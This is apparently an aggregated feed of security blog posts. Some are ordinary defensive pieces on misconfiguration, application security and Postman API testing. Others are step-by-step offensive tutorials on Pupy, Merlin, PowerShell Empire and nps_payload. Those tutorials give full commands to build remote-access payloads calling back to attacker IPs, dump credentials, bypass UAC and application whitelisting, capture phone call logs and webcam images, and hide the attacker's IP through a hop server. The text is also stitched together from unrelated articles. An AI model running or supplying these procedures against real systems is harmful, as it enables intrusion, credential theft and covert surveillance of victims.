The configuration of web and application servers is a very important aspect of web applications. Often times, failure to manage proper configurations can lead to a wide variety of security vulnerabilities within servers and environments. When these configurations are not properly addressed or ignored, the overall security posture can suffer. Sometimes the biggest problem that organizations face is that these flaws are not being identified or addressed. Instead, in many cases, configurations are not changed because of the ideology of “if it is not broke, don’t fix it”. This being a big misconception as more than likely, while a problem has not risen yet, that does not mean that they are not vulnerable to the risk.

Misconfiguration of security is a serious flaw that can actually be found as one of the top ten most critical web application security risks published by OWASP. This list represents a project by a broad consensus of security experts of team members that determine the most critical security risks to web applications. Currently this vulnerability is considered number six on this list.

So what can be done about these insecure configurations? Well, many configuration vulnerabilities can be detected by simply understanding the environment with network diagrams, spreadsheets, and IP databases as well as regular security scanning. Identification is where it all begins. An organizations should first know what applications they have on their environment so they can properly protect it. This can be accomplished with active and passive discovery scans to locate everything and produce an inventory. During the discovery phase, all information should also be classified, sensitive data defined, and all labels completed. Sensitive data being anything that is not public or unclassified, Personally Identifiable Information (PII), Protected Health Information (PHI), or proprietary data. One great tool for asset discovery scanning is called Nmap. This is a free and open-sourced scanner used to discover hosts and services by sending packets and analyzing the responses.

After you know what is on your network, the next step should be to begin scanning internally and externally for known configuration vulnerabilities. This process typically uses software tools to scan entire networks (or designated ranges) for possible known security vulnerabilities; as well as provide information about the vulnerability, possible solutions to fix the problem, and an idea of the risk that it imposes on the security posture and strength of the network. Some automated tools that can be used to complete this are OpenVAS, Nessus, Nexpose, or Qualys to name a few. Scanning is a pretty simple process, but there are still a few things to keep in mind. Some systems can be fragile such as printers, Industrial Control Systems (ICS), and phone systems; so take care when including these. Schedule daily jobs to keep on top of everything. Lastly, use a central point to pull data back to and flag key points such as new systems and applications.

Once asset discovery and vulnerability scanning is complete, a guideline for the configuration should be created. This guideline should start with the existing vendor recommended configuration as a baseline, and then modified based off of security organization’s recommendations as well as vulnerability testing results. Once complete, these guidelines should be followed and maintained.

The overall process of identifying and addressing security misconfigurations is a process that should be reviewed and compared to previous testing regularly to assess the progress and overall security posture of the organization. This regular maintenance should include monitoring for the latest security vulnerabilities released, applying the most up to date security patches available, updating the security guidelines, completing regular asset and vulnerability scanning, and regular documentation. Always remember to follow up on any potential threats or flaws in the system. It is OK to disregard some items as false positives, or even to accept them as an acceptable risk, but keep this documented at all times.

Don’t let simple configuration flaws be the difference between a solid security posture and one that is vulnerable to simple attacks.  It does not take much to maintain recommended configurations within your system and ensure that everything is up to date and working properly. Once the initial process has been established to create a guidelines, configuration management systems are also available to help standardize configurations to avoid constant maintenance and effort. Once implemented, management systems can be even set up to be semi-automated or completely automated for the configuring process. But even if automated, the process should still be regularly reviewed and maintained.

In the end, it is worth it to simply set up your organization’s web and application configurations to stay protected against vulnerabilities and attacks.

Command & Control Tool: Pupy

In this article, we will learn to exploit Windows, Linux and Android with pupy command and control tool.

Table of Content :

  • Introduction
  • Installation
  • Windows Exploitation
  • Windows Post Exploitation
  • Linux Exploitation
  • Linux Post Exploitation
  • Android Exploitation
  • Android Post Exploitation

Introduction

Pupy is a cross-platform, post exploitation tool as well as a multi-function RAT. It’s written in python which makes it very convenient. It also has low detectability that’s why it’s a great tool for the red team.  Pupy can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.

It uses a reflected DLL to load python interpreter from memory which is great as nothing will be shown in the disk. It doesn’t have any special dependencies. It can also migrate into other processes. The communication protocols of pupy are modular and stackable. It can execute non-interactive commands on multiple hosts at once. All the interactive shells can be accessed remotely.

Installation

To install pupy execute the following commands one by one :

git clone https://github.com/n1nj4sec/pupy
ls
./install.sh

Now download all the requirements using pip like the following command :

cd pupy
pip install -r requirements.txt

Now run pupy using the following command :

./pupysh.py

This command will open the prompt where you will get your session.

Now, to create our payload we will use the pupygen. Use the following help command to see all the attributes which we can use :

./pupygen.py -h

Windows Exploitation

Now we will create a windows payload in order to exploit windows with the following command :

./pupygen.py -O windows -A x86 -o /root/Desktop/shell.exe

Here,

-O : refers to the operating system

-A : refers to the architecture

-o : refers to the output file path

When you are successful in executing the shell.exe in the victims’ PC, you will have your session as shown in the image :

Windows Post Exploitation

Further, there are number of post-exploits you can use, they are pretty simple to use. Some of them we have shown in our article. For message dialogue box to pop up on the target machine you can use the following command :

msgbox –-title hack "you have been hacked"

As per the command, following dialogue box will open on the target machine :

You can also access the desktop using the remote desktop module with the following command :

rdesktop -r 0

After executing the above command you can remotely access the desktop just as shown in the image below :

For bypass UAC, we have the simplest command in pupy i.e. the following :

bypassuac -r

The above command will recreate a session with admin privileges as shown in the image below :

Then for getting the system’s credentials, you can use the following command :

creddump

And as you can see in the image below, you get the information about all the credentials :

Using pupy, we can also migrate our session to a particular process. With migrate command, the attributes of the command are shown in the image below :

With ps command, you can find out the process ID number of all the processes running on the target PC, along with letting you know which process is running. Knowing the process ID is important as it will be required in the migrate command and will help us to migrate our session as we desire.

Now, as we know the processes that are running, we can use it to migrate our session. For this, type the following command :

migrate -p explorer.exe -k

And then a new session will be created as desired.

Linux Exploitation

To exploit Linux, we will have to generate Linux payload with the following command :

./pupygen.py -O linux -A x64 -o /root/Desktop.shell

Once you execute the malicious file in the target system, you will have your session as shown in the image below :

As you have a session now, you can check if the target machine is running on a VM or is it a host machine with the following command :

check_vm

And as you can see in the image below that the target machine is, in fact, running on VM

Linux Post Exploitation

In post-exploitation, you can have detailed information about the target system with the following command :

privesc_checker --linenum

With pupy, you can also find out all the exploits that are working on the target system with the help of the following command :

exploit_suggester –shell /bin/bash

As you can see that in the image below, it has given us the list of all the exploits to which the target system is vulnerable.

To get the basic information about the target system such as IP address, MAC address, etc. you can use the following command :

get_info

Android Exploitation

Now we will create an android payload in order to exploit windows with the following command :

./pupygen.py -O android -o /root/shell.apk

When you are successful in installing the shell.apk in the victims’ Android Phone, you will have your session as shown in the image :

Android Post Exploitation

In post-exploitation, you can grab the call logs stored on the target device with the following command :

call -a -output-folder /root/call

Here,

-a : refers to getting all the call details

-output-folder : refers to the path of the output file containing the call logs

We will use the cat command on callDetails.txt to read the call logs.

To get the camera snap from the primary camera on the target device, you can use the following command :

webcamsnap -v

Here,

-v : refers to view the image directly

As we can see in the given image that we have the snap captured and stored at the given location.

To get the information about the installed packages or apps on the target device, you can use the following command :

apps -a -d

Here,

-a : refers to getting all the installed packages details

-d : refers to view detailed information

As we can see in the given image that we have detailed information about the packages or apps installed on the target machine.

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiastContact Here

The post Command & Control Tool: Pupy appeared first on Hacking Articles.

Multiple Ways to Exploiting OSX using PowerShell Empire

In this article, we will learn multiple ways to how to hack OS X using empire. There are various stagers given in empire for the same and we use a few of them in our article. Method to attack OS X is similar to that of windows. For the beginner’s guide to pen-test OS X click here.

Table of Content :

  • osx/macho
  • osx/applescript
  • osx/launcher
  • osx/jar
  • osx/safari_launcher

osx/macho

The first stager we will use to attack is osx/macho. This stager will create a Mach-O file, which is an executable format of binaries in OS X. This file format is made for OS X specifically. This file format informs the system about the order in which code and data are read into memory. So, this stager is quite useful when it comes to attacking OS X.

The listener creation is the same as windows, use the http listener. Once the listener is created, execute the following set of commands:

usestager osx/macho
set Listener http
set OutFile shell.macho
execute

As the shell.macho is executed in the victim’s PC, you will have your session as shown in the image below :

osx/applescript

The next stager we will use is osx/applescript. This stager will create a code in an apple script, this script has an automated control over scriptable Mac applications as its dedicated script for Mac. Therefore, it’s an important stager for pen-testing Mac. To create the malicious said apple script run the following set of commands :

usestager osx/applescript
set Listener http
execute

Executing the above stager will create a code, run this code in the targeted system as it is shown in the following image :

As soon as the code is executed in the victim’s PC, you will have your session as shown in the image :

osx/launcher

The next stager we will use is osx/launcher. This stager is most commonly used. To execute this stager, run the following commands :

usestager osx/launcher
execute

copy this code and run it in the target system’s shell. Now as soon as the code is executed, you will have your session as shown in the image below :

osx/jar

The nest stager which we will use is osx/jar. This stager creates a jar file which is a Java archive file. This file format is used for compressed java files which when extracted as run as desired. This file extension is specifically made for Java files. This stager turns out to be a suitable one when it comes to attacking OS X. Use the following set of commands to execute the said stager :

usestager osx/jar
set Listener http
set OutFile out.jar
execute

The stager will create a jar file as told above, as the said file will be executed in the victim’s system, you will have your session as shown in the image :

osx/safari_launcher

The last stager we will use is osx/safari_launcher, this will generate an HTML script for safari. For this stager, run the following set of commands:

usestager osx/safari_launcher
set Listener http
execute

Run the generated code in the safari of victim’s PC and so you shall have your session as shown in the image below :

So, these were five ways to attack or pentest OS X. They are pretty easy and convenient. Each of them is valid and up to date.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher  Contact Here

The post Multiple Ways to Exploiting OSX using PowerShell Empire appeared first on Hacking Articles.

Application Security Has Nothing to Do With Luck

This St. Patrick’s Day is sure to bring all the usual trappings: shamrocks, the color green, leprechauns and pots of gold. But while we take a step back to celebrate Irish culture and the first signs of spring this year, the development cycle never stops. Think of a safe, secure product and a confident, satisfied customer base as the pot of gold at the end of your release rainbow. To get there, you’ll need to add application security to your delivery pipeline, but it’s got nothing to do with luck. Your success depends on your organizational culture.

It’s Time to Greenlight Application Security

Because security issues in applications have left so many feeling a little green, consumers now expect and demand security as a top priority. However, security efforts are often seen as red, as in a red stop light or stop sign. In others, they are seen as a cautious yellow at best. But what if security actually enabled you to go faster?

By adding application security early in the development cycle, developers can obtain critical feedback to resolve vulnerabilities in context when they first occur. This earlier resolution can actually reduce overall cycle times. In fact, a 2016 Puppet Labs survey found that “high performers spend 50 percent less time remediating security issues than low performers,” which the most recent edition attributed to the developers building “security into the software delivery cycle as opposed to retrofitting security at the end.” The 2018 study also noted that high-performing organizations were 24 times more likely to automate security configurations.

Go green this spring by making application security testing a part of your overall quality and risk management program, and soon you’ll be delivering faster, more stable and more secure applications to happier customers.

Build Your AppSec Shamrock

Many people I talk to today are working hard to find the perfect, balanced four-leaf clover of application modernization, digital transformation, cloud computing and big data to strike gold in the marketplace. New methodologies such as microservice architectures and new container-based delivery models create an ever-changing threat landscape, and it’s no wonder that security teams feel overwhelmed.

A recent Ponemon Institute study found that 88 percent of cybersecurity teams spend at least 25 hours per week investigating and detecting application vulnerabilities, and 83 percent spend at least that much time on remediation efforts. While it’s certainly necessary to have these teams in place to continuously investigate and remediate incidents, they should ideally focus on vulnerabilities that cannot be found by other means.

A strong presence in the software delivery life cycle will allow other teams to handle more of the common and easier-to-fix issues. For a start this St. Patrick’s Day, consider establishing an application security “shamrock” that includes:

  • Static application security testing (SAST) for developer source code changes;
  • Dynamic application security testing (DAST) for key integration stages and milestones; and
  • Open-source software (OSS) to identify vulnerabilities in third-party software.

You can enhance each of these elements by leveraging automation, intelligence and machine learning capabilities. Over time, you can implement additional testing capabilities, such as interactive application security testing (IAST), penetration testing and runtime application self-protection (RASP), for more advanced insight, detection and remediation.

Get Off to a Clean Start This Spring

In the Northern Hemisphere, St. Patrick’s Day comes near the start of spring, and what better time to think about new beginnings for your security program. Start by incorporating application security in your delivery pipeline early and often to more quickly identify and remediate vulnerabilities. Before long, you’ll find that your security team has much more time to deal with more critical flaws and incidents. With developers and security personnel working in tandem, the organization will be in a much better position to release high-quality applications that lead to greater consumer trust, lower risk and fewer breaches.

The post Application Security Has Nothing to Do With Luck appeared first on Security Intelligence.

Better API Penetration Testing with Postman – Part 1

This is the first of a multi-part series on testing with Postman. I originally planned for it to be one post, but it ended up being so much content that it would likely be overwhelming if not divided into multiple parts. So here’s the plan: In this post, I’ll give you an introduction to setting up Postman and using it to issue your regular request. In Part 2, I’ll have you proxying Postman through Burp Suite. In Part 3, we’ll deal with more advanced usage of Postman, including handling Bearer tokens and Environment variables more gracefully. In Part 4, I’ll pull in one or two Burp plugins that can really augment Postman’s behavior for pen-testing.

In this day and age, web and mobile applications are often backed by RESTful web services. Public and private APIs are rampant across the internet and testing them is no trivial task. There are tools that can help. While (as always with pen-testing) tools are no substitute for skill, even the most skilled carpenter will be able to drive nails more efficiently with a hammer than with a shoe.

One such tool is Postman, which has been popular with developers for years. Before we get into how to set it up, here’s a quick overview of what Postman is and does. Postman is a commercial desktop application, available for Windows, Mac OS, and Linux. It is available for free, with paid tiers providing collaboration and documentation features. These features are more relevant to developers than penetration testers. It manages collections of HTTP requests for testing various API calls, along with environments containing variables. This does not replace your proxy (Burp, ZAP, Mitmproxy, etc), but actually stands in as the missing browser and client application layer. Main alternatives are open-source tools Insomnia and Advanced REST Client, commercial option SoapUI, or custom tooling built around Swagger/Swagger UI or curl.

Setting Up Postman

Postman is available from its official website at https://www.getpostman.com, as an installer for Windows and MacOS, and a tarball for Linux. It can also be found in a Snap for Ubuntu (https://snapcraft.io/postman), and other community-maintained repos such as the AUR for Arch Linux. The first step to setting it up is, of course, to install it.

Upon first launching Postman, you’ll be greeted with a screen prompting you to Create an Account, Sign up with Google, or sign in with existing credentials. However, Postman doesn’t require an account to use the tool. 

The account is used for collaborating/syncing/etc; the paid tier features. As I mentioned earlier, they’re great for developers but you probably don’t care for them. In fact, if you generally keep your clients confidential, like we do at Secure Ideas, you probably explicitly don’t want to sync your project to another 3rd party server.

If you look down near the bottom of the window, there’s some light gray text that reads Skip signing in and take me straight to the app. Click that, and you will move to the next screen – a dialog prompting you to create stuff.

There are several parts you’re not going to use here, so let’s look at the three items that you actually care about:

  • Collection – a generic container you can fill with requests. It can also act as a top-level object for some configuration choices, like Authentication rules, which we’ll expand on later.
  • Request – the main purpose for being here. These are the HTTP requests you will be building out, with whatever methods, bodies, etc. you want to use. These must always be in a Collection.
  • Environment – holds variables that you want to control in one place and use across requests or even across collections.

The Basics of Working with Postman

It’s time to create our first Postman Collection and start making requests.

The New button in the top left is what you will use for creating Collections and Requests, typically. Start by creating a Collection. This is sort of like an individual application scope. You will use to group related requests.

A collection can also act as a top-level item with Authentication instructions that will be inheritable for individual requests.

For now, just name it something, and click the Create button. I called mine Test Collection.

By default, you will have an unnamed request tab open already. Let’s take a tour of that portion of the UI.

  1. The active tab
  2. The name of this request. This is just some descriptive name you can provide for it.
  3. The HTTP Method. This drop-down control lets you change the method for this request.
  4. The URL for the request. This is the full path, just as if it was in your browser.
  5. The tabbed interface for setting various attributes of the request, including Parameters, Headers, Body, etc.
  6. The send button. This actually submits the request to the specified URL, as it is currently represented in the editor.
  7. The save button. The first time you click this, you will need to specify your collection, as the request must belong to a collection.

I have a sample target set up at http://localhost:4000, so I’m going to start by filling in this request and saving it to my collection. It’s going to be a POST, to http://localhost:4000/legacy/auth, without any parameters (what can I say? It’s a test API. It’ll let anyone authenticate). When I click the Save button, I will name the request and select the Collection for it, as below.

Then I’ll click Save to Test Collection (adjust for your collection name) to save my request. Now, clicking the Send button will issue the request. Then I will see the Response populated in the lower pane of the window, as below.

  1. The tab interface has the Body, Cookies, Headers, and Test Results. We haven’t written any tests yet, but notice the badges indicating the response returned 1 cookie and 6 headers.
  2. The actual response body is in the larger text pane.
  3. We have options for pretty-printing or Raw response body, and a drop-down list for different types (I believe this is pre-populated by the content-type response header). There’s also a soft-wrap button there in case you have particularly wide responses.
  4. Metrics about the response, including HTTP Status Code, Time to respond, and Size of response.

A Side-Note about Cookies

Now, if we reissue our request with Postman, we’ll notice an important behavior: the cookie that the previous respnse had set will be included automatically. This mimics what a browser normally does for you. Just as you would expect from the browser, any requests Postman issues within that cookie’s scope will automatically include that cookie.

What if you want to get rid of a cookie?
That’s easy. Just below the Send button in Postman, there’s a Link-like button that says Cookies. Click that, and it will open a dialog where you can delete or edit any cookies you need to.

And that’s it in a nutshell for Cookie-based APIs. But let’s face it: it’s more common for APIs to use Bearer tokens than it is to have them use Cookies, today. We’ll address that in the upcoming section, along with some other, more advanced concepts.

What’s Next

In Part 2, we’ll proxy Postman through Burp Suite, and talk about the advantages of that approach.
In Part 3, we’ll dig into some more advanced usage of Postman.
In Part 4, we’ll use some Burp Suite extensions to augment Postman.

The Power of Vulnerability Management: Are You Maximizing Its Value?

Tripwire has been in the business of providing vulnerability management solutions with IP360 for about 20 years. With over 20,000 vulnerabilities discovered last year alone, vulnerability management continues to be an important part of most security plans. And most organizations agree. In a recent survey, 89 percent of respondents said that their organizations runs vulnerability […]… Read More

The post The Power of Vulnerability Management: Are You Maximizing Its Value? appeared first on The State of Security.

Command and Control Guide to Merlin

In this article, we learn how to use Merlin C2 tool. It is developed by Russel Van Tuyl in Go language.

Table of content:

  • Introduction
  • Installation
  • Windows exploitation
  • Windows post exploitation
  • Linux exploitation
  • Linux post exploitation

Introduction

Merlin is a great cross-platform Command and control tool written in the Go language. It’s made of two elements i.e. the server and agent. It works on the HTTP/2 protocol. The best things about Merlin are that it is compiled to work on any platform and that you can even build it from source. Normally, agents are put on windows and are being listened on Linux but due to being written in Go language, Merlin lets us put agents on any platform/machine we come across and we can listen to it also on any platform. This is much more successful than others when it comes to red teaming as it makes IDS/IPS struggle to identify it.

The Merlin server is to be run in the folder where agents can call out to it. By default, the server is configured on 127.0.0.1:443 but you can change it to your own IP. The merlin agent can be, as discussed earlier, cross-complicated to run on any platform. Agents are interacted using the Merlin server. Any binary file is executed with the target’s path variable.

Installation

Merlin’s installation is pretty tricky. The most convenient way to download is shown in this article. Installing Go language is compulsory in order for Merlin to work. So, to install the Go language type:

apt install golang

And then to install merlin the following commands:

mkdir /opt/merlin;cd /opt/merlin
wget https://github.com/Ne0nd0g/merlin/releases/download/v0.1.4/merlinServer-Linux-x64-v0.1.4.7z

Once the above commands are executed successfully, use the following command to unzip merlin server.

7z x merlinServer-Linux-x64-v0.1.4.7z

Now, after unzipping, when you use ls command; you will find the merlin server and readme file. We can check if the server is running by using the following command:

./merlinServer-Linux-x64

In “README.MD”, we find the instructions for installing “Merlin” in our system.

Now according to the readme file, we have to setup GOPATH environment variable for the installation and then install merlin using “go” instead of git clone. So, to complete these steps run the following set of commands:

echo "export GOPATH=$HOME/go" >> .bashrc
source .bashrc
go get github.com/Ne0nD0g/merlin

Once the directory is downloaded, let’s check its contents using cd and ls commands.

There was a cmd directory, and in it, there was a directory named merlinserver where we found main.go. Run main.go as shown in the image below :

go run main.go

As you can see the tool merlin is still not running properly as there is no SSL certificate given to it. If you navigate through the /opt/merlin directory, you will find a directory named data in which there is an SSL certificate. Copy the data folder into the merlinserver directory as shown in the image below:

Now if you run merlin using the command: go run main.go, merlin server will run successfully.

Now using the following help command you can see, as shown in the image, the arguments that you can use to run your commands as desired:

go run main.go -h

Windows exploitation

Now, to make Merlin agent for windows type the following command:

GOOS=windows GOARCH=amd64 go build -ldlags "-X main.url=https://192.168.0.11:443" -o shell.exe main.go

Now, share the shell with the target using the python server:

python -m SimpleHTTPServer 80

In order to create a listener for the shell to revert, use the following command:

go run main.go -i 192.168.0.11

And just like that, you will have your session as shown in the image above. Now, use the help command to see all the options as shown in the image given below:

Type sessions to see the list of the sessions you acquire as shown in the image below:

To access than an available session uses the following command:

interact <session name>

As you have accessed the session, here you can use windows commands such as:

shell ipconfig

Then further you can use various post exploitation modules, list of which are shown in the image below:

Windows post exploitation

We will be using a module here to dump the credentials of windows and to activate the said post exploitation module type:

use module windows/x64/powershell/credentials/dumpCredStore

As you can see in the image above that info commands gives us all the details about the module including the options that we need to specify in the module. So, therefore, let’s set the options:

set agent <agent name>
run

Linux exploitation

Now, we will make a merlin agent for Linux machine. For this, simply type the following command:

Export GOOS=linux;export GOARCH=amd64; go build -ldflags "-s -w -X main.url=https://192.168.0.11:443" -o shell.elf main.go

Once the command is executed, your malware will be created. Use the python to share the file with the victim as shown in the image below or however see it fit. For starting python HTTP server:

python -m SimpleHTTPServer 80

Setup the listener and wait for the file to get executed.

go run main.go -I 192.168.0.11

And as shown in the image above, you will have your session. Then type sessions to see the list of sessions gained.

Then to access the session use the following command:

interact <session name>

Then further you can use any Linux command such as:

shell ls

Linux post exploitation

Even in Linux, you can further use a number of post-exploitation modules. The one we will be using in this article is privesc/LinEnum:

use module linux/x64/bash/priesc/LinEnum

Through info command, we know that we have to give a session in order to run this module. So, type:

set agent <session name>
run

And this way your module will run. Try and work with Merlin c2 tool as its one of best and as you can see how convenient it is crossed-platformed.

Author: Sayantan Bera is a technical writer at hacking articles and cybersecurity enthusiast. Contact Here

The post Command and Control Guide to Merlin appeared first on Hacking Articles.

Bypass User Access Control using Empire

This is the fifth article in our empire series, for the basic guide to empire click here. In this article, we will learn to bypass administrator privileges using various bypassuac post-exploitation methods.

Table of content :

  • Introduction
  • Bypassuac_env
  • Bypassuac_eventvwr
  • Bypassuac_fodhelper
  • Bypassuac_wscript
  • Bypassuac

Introduction

UAC stands for User Account Control, which means which user has how many rights to make changes in the system. The rights are given too a user depends on the integrity levels; which are :

  • High : Administrator rights
  • Medium : Standard user rights
  • Low : Extremely restricted

UAC works by adjusting the permission level of our user account, and on the bases of this permission, it decides whether to run a program or not. When changes are made to this permission level, it notifies us but these modules help us to bypass UAC. When we try and gain the highest integrity that is indicated by the number 1.

Bypassuac_env

 Let’s start with the first exploit i.e. bypassuac_env. Now, as you can see in the image, we already have an empire session with the integrity of 0, which means we do not have admin right. So type the following set of commands to get administrator privileges :

usemodule privsec/bypassuac_env 
set Listener http 
execute

Executing the above module will give you a new session. Upon accessing the said session you can see the integrity has to change to 1, which means no we have administrator rights, just as shown in the image below :

bypassuac_eventvwr

Now, let’s try another exploit which is privsec/bypassuac_eventvwr. The function of this module is the same as before i.e. to get administrator rights so we can attack more effectively.  This module makes changes in the registry key and inserts a custom command which is then executed when windows event viewer is launched. This custom command will turn the UAC flag off. And, as you can see, we have the session with the integrity of 0 which indicates we have no admin rights yet. So, run the following commands :

usemodule privsec/bypassuac_eventvwr 
set Listener http 
execute

As you can see, we have a new session with the integrity of 1 which confirms that we now have admin rights.

Bypassuac_fodhelper

The next module we will use for the same purpose is privesc/bypassuac_fodhelper. This module will gain administrator rights by hijacking a special key in the registry and inserting custom command that will get invoked when windows fodhelper.exe application will be executed. It covers its tracks by getting rid of the key after the payload is invoked. Now, just like before use the following set of commands :

usemodule privesc/bypassuac_fodhelper 
set Listener http execute

Once the module is executed, you will have the session with the integrity of 1, hence we are successful in attaining the admin rights.

bypassuac_wscript

Next the bypassuac module we will use is privesc/bypassuac_wscript. When using wscript for UAC bypass, there is no need for you to send a dll to the target. As wscrpit.exe does not has embedded manifestation, it’s easy to abuse it. And similarly, to have administrator privileges use the following commands :

usemodule privesc/bypassuac_wscript 
set Listener http 
execute

As you can see in the image, the new session that we have gained is with admin rights.

bypassuac

The last module we will use for the same purpose is privesc/bypassuac, this is a trivial process. To execute the following commands :

usemodule privesc/bypassuac 
set Listener http 
execute

As you can see in the image above, the new session gained has the integrity of 1 hence the administrator rights are gained.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Bypass User Access Control using Empire appeared first on Hacking Articles.

nps_payload: An Application Whitelisting Bypass Tool

In this article, we will create payloads using a tool named nps_payload and get meterpreter sessions using those payloads. This tool is written by Larry Spohn and Ben Mauch. Find this tool on GitHub.

Attacker: Kali Linux

Target: Windows 10

Table of Content:

  • Downloading and Installing
  • Getting session using MSBuild
  • Getting session using MSBuild HTA

Downloading and Installing

First, we will get the tool in our attacker machine. It is Kali Linux in our case. The tool is available at GitHub. We will use the git clone command to download it on our machine.

git clone https://github.com/trustedsec/nps_payload.git

Now we will traverse inside the folder that was downloaded using the git clone, we can check that if we have successfully downloaded the file using ls command. After that use cd to get inside the nps_payload folder. There are some requirements that are required for the nps_payload to run. Those are mentioned inside in the requirements text file. Now we can either install each of those requirements individually but that would be time taking. We will use the pip install command and then mention the requirements file. It will automatically pick the requirements from the file and install it.

pip install -r requirements.txt

Getting session using MSBuild

Now that we have successfully downloaded the tool and installed the requirements now it’s time to launch the tool and create some payloads and get some sessions. To launch the tool, we can either use command

python nps_payload.py

or we could just

./nps_payload.py

After launching the tool, we are given options to choose the technique we need to use. Is it going to be a default msbuild payload or the one in the HTA format? We are going to use both but first, we will choose the default msbuild payload. Next, we have to choose the type of payload, is going to be reverse_tcp or reverse_httpor reverse_https or a custom one. We can choose anyone, but here we are choosing the reverse_tcp.

Following this, we are asked to enter the Local IP Address. This is the IP address of the machine where we want the session to reach. That is the attacker machine. In our case, it is Kali Linux. After that, we are asked to enter the listener port. It is selected 443 by default. We are not changing it. That’s it, we are now told that the payload is successfully created as a msbuild_nps.xml file. Also, we are told to start a listener.

We will start the listener before anything else. To do this we have to be inside the nps_payload folder. Now the author has provided us with a script that will create a listener for us. So, we will run it as shown below.

msfconsole -r msbuild_nps.rc

Let’s check the file that we created earlier using the ls command. Now to send the file to the target we will host the directory using the HTTP server as shown below:

python -m SimpleHTTPServer 80

Now onto the target machine. We browse the IP Address of the attacker machine and we see that we have the file msbuild_nps.xml. Now to use the msbuild to execute this XML file, we will have to shift this payload file inside this path:

C:\Windows\Microsoft.NET\Framework\v4.0.30319

Once we got the nps_payload.xml file inside the depicted path. Now we need a command prompt terminal (cmd) at that particular path. After we have a cmd at this path we will execute the nps_payload command as shown below.

MSBuild.exe msbuild_nps.xml

Now back to our attacker machine, here we created a listener earlier. We see that we have a meterpreter session. This concludes out the attack.

NOTE: If a session is not opened, please be patient. It sometimes takes a bit of time to generate a stable session.

Getting session using MSBuild HTA

Let’s get another session using the HTA file. To do this we will generate an HTA file. First, we will launch the tool using the command below.

./nps_payload.py

After launching the tool, we are going to choose the HTA payload. Next, we have to choose the type of payload, is going to be reverse_tcp or reverse_httpor reverse_https or a custom one. We can choose anyone, but here we are choosing the reverse_tcp.

Following this, we are asked to enter the Local IP Address. This is the IP address of the machine where we want the session to reach. That is the attacker machine. In our case, it is Kali Linux. After that, we are asked to enter the listener port. It is selected 443 by default. We are not changing it. That’s it, we are now told that the payload is successfully created as msbuild_nps.hta file. Also, we are told to start a listener.

We will start the listener as we did earlier.

msfconsole -r msbuild_nps.rc

Let’s check the file that we created earlier using the ls command. Now to send the file to the target we will host the directory using the HTTP server as shown below:

python -m SimpleHTTPServer 80

Now onto the target machine. We browse the IP Address of the attacker machine and we see that we have the file msbuild_nps.hta. Right click on it and choose to Save the Link As. This will download the payload.

Once we got the nps_payload.hta file. Now we need a command prompt terminal (cmd) at that path where we saved the payload file. In our case is the Downloads Folder of the current user. After we have a cmd at this path we will execute the nps_payload command as shown below.

mshta.exe msbuild_nps.hta

Now back to our attacker machine, here we created a listener earlier. We see that we have a meterpreter session. This concludes the attack.

NOTE: If a session is not opened, please be patient. It sometimes takes a bit of time to generate a stable session.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing. Contact here

The post nps_payload: An Application Whitelisting Bypass Tool appeared first on Hacking Articles.

Hiding IP During Pentest using PowerShell Empire (http_hop)

This is our fourth article in empire series, in this article we learn to use hop payload in PowerShell empire. Empire has an inbuilt listener named http_hop which allows us to redirect our traffic to one of our another active listener after getting an agent. Thus, the name hop as it hops the agent from one listener to another in order to redirect traffic.

Similar to Metasploit, the hop listener in empire uses a hop.php file. When you activate the hop listener, it will generate three PHP files that will redirect your existing listener. Place the said files in your jump server (ubuntu) and then set up your stager in according to get the session through the mediator i.e. our hop listener.

In the following image, you can see our Kali’s IP. Now, we will try and take windows session via ubuntu using http_hop payload, in order to hide our own IP, i.e. basically, our http_hop payload will help us (attacker) to hide from the getting caught.

Here, in the following image, you can see our ubuntu’s IP too.

Now, let’s get started. First, we should have a simple http listener, for that type :

uselistener http
execute

Now, start the http_hop listener by typing :

uselistener http_hop
set RedirectListener http
set Host http://192.168.1.111

Here, we have given RedirectListener i.e. all the traffic from http listener will be directed to the http_hop listener.

Executing the above listener will create three files as you can see that in the image above. Transfer these files to /var/www/html location of your Ubuntu as shown in the image below :

Now, you can see in the image below we have activated two listeners :

Let’s start our stager by typing the following commands :

usestager windows/launcher_bat
set Listener http_hop
execute

Once our bat file is executed in the target PC, we will have our session. Now, if you observe the IP through which we have obtained the session is of Ubuntu and not of windows but we have the access of a Windows PC, similarly, in windows, it will show that the attacking machine is Ubuntu and not kali. Hence our http_hop is effective.

In conclusion, the major advantage of the http_hop listener is that it helps an attacker from being identified as on the target PC, as the said listener hides the original IP.

AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

The post Hiding IP During Pentest using PowerShell Empire (http_hop) appeared first on Hacking Articles.

Why Is Penetration Testing Critical to the Security of the Organization?

A complete security program involves many different facets working together to defend against digital threats. To create such a program, many organizations spend much of their resources on building up their defenses by investing in their security configuration management (SCM), file integrity monitoring (FIM), vulnerability management (VM) and log management capabilities. These investments make sense, […]… Read More

The post Why Is Penetration Testing Critical to the Security of the Organization? appeared first on The State of Security.

Android App Testing on Chromebooks

Part of testing Android mobile applications is proxying traffic, just like other web applications.  However, since Android Nougat (back in 2016), user or admin-added CAs are no longer trusted for secure connections.  Unless the application was written to trust these CAs, we have no way of viewing the https traffic being passed between the client and servers.  Your only two options are to either buy a device running an older version of Android OS or to root your existing device.  Rooting a device can cause all sorts of issues and depending on your system may require a bit of effort and installation of other tools and utilities.  This is probably overkill just for adding a certificate.  Luckily, there is another option: Chromebooks. 

Google has been promoting the ability to install apps from the Google Play store since the middle of 2016.  Now, to proxy the traffic from an Android application, you will most likely still need to root the Android subsystem.  This is not always the case but, even if you do, rooting (and un-rooting) a Chromebook is remarkably easy.  Not to mention, you get a real keyboard and large screen!  However, before you run out and buy a Chromebook to use for testing, you should be aware of a few caveats:

  • Not all Chromebooks can run Android apps
  • Not all Android apps install on a Chromebook
  • Rooting the Android subsystem will wipe all existing user data on the Chromebook
  • Using the Developer Mode will stop the chromebook from installing most updates and prevent some applications from installing

Let’s walk through the process of getting the Burp CA cert added as a System CA on a Chromebook’s Android subsystem.  The whole process takes about an hour (depending on the speed of your Chromebook).  Before we start making any changes, be sure to copy any data you want to keep off of the Chromebook.  This process will wipe the device.

